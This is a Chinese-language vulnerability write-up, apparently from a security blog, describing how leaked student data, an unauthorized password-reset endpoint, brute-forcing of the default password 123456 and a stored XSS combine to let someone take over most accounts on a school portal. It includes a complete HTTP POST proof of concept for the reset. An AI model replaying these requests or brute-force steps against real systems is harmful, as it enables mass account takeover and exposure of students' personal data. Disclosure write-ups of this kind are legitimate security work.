前引:总的来说就是信息泄露+越权+爆破登录+xss这四个漏洞导致的连锁反应,因为他有默认密码123456,所以最终可以重置全校学生的密码,并都植入xss,危害十足。
信息收集:和嘉名童鞋一起测试的,都是他收集的QAQ 主要通过百度贴吧搜集到了默认密码和学号信息,实在是牛皮
漏洞复现:漏洞复现:
漏洞一:某接口没有对权限进行限制导致信息泄露
登录后访问/stu/m/member/list
抓取数据包:
可以看到其他同班同学的个人资料,有学号、电话、邮箱,并且因为默认密码为123456,所以获取其他人的学号后可以登录很多的账号;
重要的是,该接口泄露了userid!这在接下来的漏洞二中有着很严重的危害:
第一个接口泄露了同班同学的userid,第二个接口可以通过userid重置密码。第三个漏洞没防爆破,有默认密码可以爆破学号登录很多账号,导致可以重置学校大部分用户的密码
漏洞二:任意用户密码重置123456
危害:只需要登录任一账号获取学生权限,便可以将任意用户的密码重置为默认密码123456:
POC:
POST /stu/m/member/resetPassword HTTP/1.1
Host: xxxx
Cookie: 【登录任意账号的cookie即可】
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 14
Origin: xxxxx
Referer: xxxxx
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
userId=4841276
漏洞复现:先访问/stu/m/member/resetPassword后抓包
改为post包,加一个参数userId=4841276【userId在漏洞一未授权访问里可以看到,我重置了我测试的账号】
重置成功,恢复为默认密码123456
userid在漏洞一的未授权访问里获取:
比如我们想登录这位07116224的同学账号,未授权访问获取userId=4841566
登录随意一个账号后,构造如下数据包发送
登陆账号为xxxx+学号,默认密码123456
=
登陆成功
漏洞三:登录处无验证码,因为默认密码为123456,所以可爆破用户名漏洞
利用登陆账号为xxxx+学号,默认密码123456,爆破学号
抓取登录数据包:
我这里就爆破后四位数字:
随便测四位数都登陆成功了几百个账号,如果从八位数学号都爆破,估计涉及 成千上万账号;
而且结合漏洞一和漏洞二,可以重置全校的账号为默认密码123456,你说危害大不大
登陆账号涉及支付功能
漏洞四:存储型xss
个人资料上传照片,抓取数据包:
图片路径更新这条数据包—可以更换图片路径参数
漏洞1-3可登录学校百分之八九十的账户,漏洞4可导致同学账户被上存储型xss…
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
免费领取安全学习资料包!
渗透工具
技术文档、书籍
面试题
帮助你在面试中脱颖而出
视频
基础到进阶
环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
应急响应笔记
学习路线
扫一扫
521
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
